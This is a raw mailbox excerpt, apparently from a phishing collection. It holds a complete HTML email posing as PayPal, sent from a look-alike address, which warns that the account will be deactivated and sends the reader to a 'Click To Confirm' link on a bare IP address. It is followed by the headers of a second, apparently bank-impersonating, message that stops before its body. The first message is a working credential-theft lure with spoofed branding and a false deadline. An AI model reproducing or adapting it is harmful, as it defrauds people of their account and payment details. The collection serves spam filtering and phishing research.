From: "PayPal Service" <official@ail.com>
Subject: You just need to confirm your billing address.
To: jose@gmail.com
Content-Type: text/html;iso-8859-1
Reply-To: official@ail.com
Date: Tue, 19 May 2015 10:32:17 -0700
X-Priority: 3
X-Library: Indy 8.0.25
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - esla.mss.co
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - ail.com
X-Get-Message-Sender-Via: esla.mss.co: authenticated_id: jaamesld/only user confirmed/virtual account not confirmed
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 92

<div id="yui_3_7_2_1_1366036663675_1935" class="yiv1584300061ppmail"><style type="text/css">#yiv1584300061 #yiv1584300061emailWrapperTable h1, #yiv1584300061 #yiv1584300061emailWrapperTable h2 {font-family:Verdana, Arial;margin-bottom:2px;font-size:15px;}
#yiv1584300061 #yiv1584300061emailWrapperTable h3 {font-size:13px;}
#yiv1584300061 #yiv1584300061emailWrapperTable h4 {font-size:11px;}
#yiv1584300061 a {color:#084482;text-decoration:underline;}#yiv1584300061 a.yiv1584300061actionLink {color:#000;text-decoration:none;}
#yiv1584300061 hr {display:none;}
#yiv1584300061 .yiv1584300061small {font-size:10px;}
#yiv1584300061 .yiv1584300061ppid {color:#757575;}
#yiv1584300061 p {margin:11px 0;padding:0;}
</style>



<table id="yiv1584300061emailWrapperTable" style="font:11px Verdana, Arial, Helvetica, sans-serif;color:#333;" border="0" cellpadding="0" cellspacing="0" width="580"><tbody id="yui_3_7_2_1_1366036663675_1934"><tr id="yui_3_7_2_1_1366036663675_2006" valign="top"><td id="yui_3_7_2_1_1366036663675_2005" colspan="3"><table id="yui_3_7_2_1_1366036663675_2004" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody id="yui_3_7_2_1_1366036663675_2003"><tr id="yui_3_7_2_1_1366036663675_2009" valign="top"><td id="yui_3_7_2_1_1366036663675_2008"><a id="yui_3_7_2_1_1366036663675_2007" rel="nofollow" target="_blank" href="https://www.paypal.com/us"><img id="yui_3_7_2_1_1366036663675_2010" src="http://imageshack.com/a/img543/1362/wnj3.gif" alt="PayPal" border="0"></a></td></tr><tr id="yui_3_7_2_1_1366036663675_2002"><td id="yui_3_7_2_1_1366036663675_2001"><img alt="" src="http://images.paypal.com/en_US/i/scr/pixel.gif" border="0" height="10" width="1"></td></tr><tr><td></td></tr></tbody></
 table></td></tr><tr id="yui_3_7_2_1_1366036663675_1943"><td id="yui_3_7_2_1_1366036663675_1942" colspan="3"><img id="yui_3_7_2_1_1366036663675_1941" src="http://images.paypal.com/en_US/i/scr/scr_emailTopCorners_580wx13h.gif" style="vertical-align:bottom;" alt="" border="0" height="13"></td></tr><tr id="yui_3_7_2_1_1366036663675_1933"><td style="background:left repeat-y;border-left:1px solid #ddd;" width="12"><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" alt="" border="0"></td><td id="yui_3_7_2_1_1366036663675_1932" class="yiv1584300061contentArea" style="width:530px;word-wrap:break-word;padding:12px;margin:0;" width="530"><table id="yui_3_7_2_1_1366036663675_1947" style="font:Verdana, Arial, Helvetica, sans-serif;" width="100%"><tbody id="yui_3_7_2_1_1366036663675_1946"><tr id="yui_3_7_2_1_1366036663675_1945"><td id="yui_3_7_2_1_1366036663675_1944"></td></tr></tbody></table><p id="yui_3_7_2_1_1366036663675_1931">Dear member,</p><p id="yui_3_7_2_1_1366036663675_1972">You 
 just need to confirm your billing address.</p><p id="yui_3_7_2_1_1366036663675_1973">If you did not confirm it until 31th of May 2015, Your account will be deactivated.</p><style type="text/css">#yiv1584300061 .yiv1584300061tips ul, #yiv1584300061 .yiv1584300061tips ol {margin-left:0;padding:4px 0 4px 20px;}
#yiv1584300061 .yiv1584300061tips ul li, #yiv1584300061 .yiv1584300061tips ol li {margin-left:0;padding-left:0;}</style>

<table id="yui_3_7_2_1_1366036663675_1977" class="yiv1584300061tips" style="border:1px solid #eee;font:11px Verdana, Arial, Helvetica, sans-serif;" cellpadding="10" cellspacing="0"><tbody id="yui_3_7_2_1_1366036663675_1976"><tr id="yui_3_7_2_1_1366036663675_1975"><td id="yui_3_7_2_1_1366036663675_1974" style="margin:0;font:11px Verdana, Arial, Helvetica, sans-serif;color:#333;">Just a reminder:<ul id="yui_3_7_2_1_1366036663675_1978"><li id="yui_3_7_2_1_1366036663675_1979">Never share your password with anyone.</li><li id="yui_3_7_2_1_1366036663675_1980">Never share your personal information with any one.</li><li id="yui_3_7_2_1_1366036663675_1981">Use different passwords for each of your online accounts.</li><li id="yui_3_7_2_1_1366036663675_1981">Be sure to include uppercase and lowercase letters, numbers, and symbols in your password.</li></ul></td></tr></tbody></table><p id="yui_3_7_2_1_1366036663675_1982">Sincerely,<br>PayPal</p><p>To get in touch with us</p><a target="_blank" hr
 ef="http://84.19.27.254/~baypalsc/cola/">Click To Confirm</a></td><td style="background:left repeat-y;border-right:1px solid #ddd;" width="12"><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" alt="" border="0"></td></tr><tr id="yui_3_7_2_1_1366036663675_2000"><td id="yui_3_7_2_1_1366036663675_1999" colspan="3"><img id="yui_3_7_2_1_1366036663675_1998" src="http://imageshack.com/a/img547/1539/wo1v.gif" alt="" border="0" height="13"></td></tbody></table><table id="yiv1584300061emailFooter" style="padding-top:20px;font:10px Verdana, Arial, Helvetica, sans-serif;color:#333;"<tbody id="yui_3_7_2_1_1366036663675_1986"><tr id="yui_3_7_2_1_1366036663675_1985"><td id="yui_3_7_2_1_1366036663675_1984"><div id="yui_3_7_2_1_1366036663675_1983" class="yiv1584300061footerLinks" style="margin:5px 0;padding:0;"></div><p id="yui_3_7_2_1_1366036663675_1987">This email was sent by an automated system, so if you reply, nobody will see it.</p><p id="yui_3_7_2_1_1366036663675_1995"></p><img src="h
 ttps://102.112.2O7.net/b/ss/paypalglobal/1/G.4--NS/123456?pageName=system_email_PP1263" alt="" border="0" height="1" width="1"><img src="https://t.paypal.com/ts?ppid=PP1263&amp;cnac=US&amp;rsta=en_US&amp;e=op&amp;mchn=em&amp;s=ci&amp;mail=sys&amp;page=main:email::::::" alt="" border="0" height="1" width="1"><p id="yui_3_7_2_1_1366036663675_1996" class="yiv1584300061xptFooter yiv1584300061ppid" style=""></p></td></tr></tbody></table></div>

From boasecurity@goldinalsincz.com  Thu May 28 10:19:29 2015
Return-Path: <boasecurity@goldinalsincz.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id C5A6CF4132
	for <jose@login.monkey.org>; Thu, 28 May 2015 10:19:29 -0500 (CDT)
Received: from smtpin13.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay02.b.hostedemail.com (Postfix) with SMTP id 7C02E27AC2A
	for <jose@login.monkey.org>; Thu, 28 May 2015 15:19:29 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70236669258.13.pain04_35af868d90002
Authentication-Results: auth.b.hostedemail.com; dkim=pass
	reason="1024-bit key; insecure key"
	header.d=goldinalsincz.com header.i=@goldinalsincz.com
	header.b=n3wh0Tn/; dkim-adsp=pass; dkim-atps=neutral
X-Spam-Summary: 2,0,0,02e14e3e4f018d63,d41d8cd98f00b204,boasecurity@goldinalsincz.com,,RULES_HIT:41:72:152:355:379:962:967:973:978:983:988:989:1189:1208:1212:1221:1260:1313:1314:1345:1431:1432:1437:1516:1517:1518:1534:1542:1546:1575:1589:1594:1711:1730:1776:1792:1803:2068:2069:2198:2199:2525:2538:2557:2559:2565:2570:2682:2685:2703:2820:2859:2890:2892:2898:2902:2909:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3352:3769:3865:3866:3867:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:4042:4321:4362:5007:6117:6119:6248:6261:7801:7903:8603:8957:8985:9025:9388:10049:10305:10400:10429:10430:10431:11245:11289:11658:12217:12219:12812:13139:13156:13163:13228:13229,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:3:0
X-HE-Tag: pain04_35af868d90002
X-Filterd-Recvd-Size: 4925
Received: from s102.avahost.net (s102.avahost.net [174.34.252.13])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 28 May 2015 15:19:28 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=goldinalsincz.com; s=default;
	h=Message-ID:Subject:To:From:Date:Content-Type:MIME-Version; bh=AUFn4b/vY7YTqPxPiTC0ASfgtyAK9vvnkgxuX56hHzg=;
	b=n3wh0Tn/k5+Et5Uko1ZIMjFSNbiPud9RHOLX6kHV7AQ/1ylA1bLb/VckZdHdoDM2QQyzqPAqDrYEpJfb7FkNm3nNhF9u71d6jScYMDLHIlve3/vOXpW7d0LUT7Jh6F+rc4lAa6p06jGN+OS+iWO+6RSDM5qYWCQmr4HNrCEwd7U=;
Received: from localhost ([::1]:38966 helo=goldinalsincz.com)
	by s102.avahost.net with esmtpa (Exim 4.85)
	(envelope-from <boasecurity@goldinalsincz.com>)
	id 1YxzW8-003kVe-Vs; Thu, 28 May 2015 11:14:45 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="=_b6f26ee2ee43f3df0310b4fad329e504"
Date: Thu, 28 May 2015 11:14:44 -0400
